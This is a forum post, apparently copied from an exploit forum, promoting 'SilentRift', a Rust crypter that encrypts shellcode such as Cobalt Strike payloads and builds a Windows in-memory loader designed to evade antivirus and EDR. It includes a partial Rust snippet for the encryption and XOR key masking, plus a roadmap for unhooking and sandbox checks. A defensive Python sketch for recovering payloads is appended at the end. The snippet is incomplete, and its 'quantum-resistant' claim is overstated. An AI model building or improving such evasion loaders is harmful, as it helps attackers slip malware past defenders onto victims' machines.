baryshnikov
(c) taken from exploit
SilentRift — Quantum-Resistant Encrypter and In-Memory Loader
Hello everyone! I want to share my project that I made in 2021. It's a CLI tool written in Rust that encrypts raw payloads (like Cobalt Strike shellcode) using a modern quantum-resistant AEAD cipher ChaCha20-Poly1305, and builds a Windows EXE loader which runs the payload fully in memory without touching the disk. This greatly increases the chances to bypass antivirus and EDR solutions.
What SilentRift Can Do?
- Quantum-resistant encryption with ChaCha20-Poly1305 (authenticated encryption)
- Key and nonce obfuscation with XOR masking for stealth
- Generates a Windows loader EXE that executes the decrypted payload in-memory using VirtualAlloc and CreateThread
- Fully in-memory execution with zero disk drops
- Interactive CLI menu for easy configuration:
  - Set raw payload as hex string
  - Load payload from a file
  - Set output EXE filename
  - Build the final loader EXE
- Uses Windows API (winapi crate) for payload execution
- Written in Rust for speed, safety, and minimal dependencies
./silentrift
=== SilentRift CLI Menu ===
1) Set raw payload (hex string, e.g. 90 90 90 CC)
2) Set path to payload file (file.bin)
3) Set output EXE name
4) Build loader EXE
5) Show current config
Ctrl+C to exit
Enter choice:
You can input the payload directly as hex bytes or load it from a file, then specify the output executable name, and build the loader EXE.
Core Encryption and Loader Build Snippet
Code:
use chacha20poly1305::{ChaCha20Poly1305, Key, Nonce};
use rand::RngCore;

fn build_loader(payload: &[u8], output_name: &str) -> anyhow::Result<()> {
    let key = Key::generate(&mut rand::thread_rng());
    let mut nonce_bytes = [0u8; 12];
    rand::thread_rng().fill_bytes(&mut nonce_bytes);
    let nonce = Nonce::from_slice(&nonce_bytes);
    let cipher = ChaCha20Poly1305::new(&key);
    let encrypted = cipher.encrypt(nonce, payload)?;
    // Key and nonce obfuscation with XOR mask for stealth
    let mask = rand::random::<u8>();
    let obf_key: Vec<u8> = key.as_slice().iter().map(|b| b ^ mask).collect();
    let obf_nonce: Vec<u8> = nonce_bytes.iter().map(|b| b ^ mask).collect();
    // Generate the loader source code embedding encrypted payload and obfuscated keys...
    // (omitted for brevity)
}
Why SilentRift?
SilentRift is designed for red team operators who need to deploy payloads stealthily on Windows targets. By encrypting the payload with a quantum-resistant cipher and executing it purely in memory with obfuscated keys, SilentRift makes detection and static analysis much harder.
Future Work
- Implement additional stealth techniques like API unhooking and sandbox checks
- Add password-derived keys to avoid embedding static keys
- More code obfuscation for the loader binary
Feel free to ask questions or suggest improvements!
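For analysts triaging a sample built the way the snippet above describes, this Python sketch is an added example (not part of the original post or of the SilentRift code): because the key and nonce share one single-byte XOR mask, only 256 candidates exist, and the Poly1305 tag confirms the right one. It assumes the 32-byte masked key, 12-byte masked nonce and ciphertext have already been carved from the sample; `recover_payload` and `make_constructed_sample` are hypothetical names, and the third-party `cryptography` package is required.

```python
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305


def recover_payload(obf_key: bytes, obf_nonce: bytes, blob: bytes):
    """Try all 256 one-byte masks; return (mask, plaintext) or None."""
    if len(obf_key) != 32 or len(obf_nonce) != 12:
        raise ValueError("expected a 32-byte key and a 12-byte nonce")
    for mask in range(256):
        # Undo the XOR mask exactly as the snippet applied it.
        key = bytes(b ^ mask for b in obf_key)
        nonce = bytes(b ^ mask for b in obf_nonce)
        try:
            # blob is ciphertext || 16-byte Poly1305 tag, no associated data.
            # A wrong mask yields a wrong key/nonce, so the tag check fails.
            return mask, ChaCha20Poly1305(key).decrypt(nonce, blob, None)
        except InvalidTag:
            continue
    return None  # blob was tampered with or the layout assumption is wrong


def make_constructed_sample(mask: int, plaintext: bytes):
    """Build a constructed (not real) sample masked the way the snippet does."""
    key, nonce = bytes(range(32)), bytes(range(100, 112))
    blob = ChaCha20Poly1305(key).encrypt(nonce, plaintext, None)
    obf_key = bytes(b ^ mask for b in key)
    obf_nonce = bytes(b ^ mask for b in nonce)
    return obf_key, obf_nonce, blob


if __name__ == "__main__":
    sample = make_constructed_sample(0x5A, b"constructed benign test bytes")
    print(recover_payload(*sample))
```

The same property makes the embedded key material a usable static signature target: masking changes the bytes per build but not the fact that a 32-byte and a 12-byte value sit next to an AEAD blob in the loader.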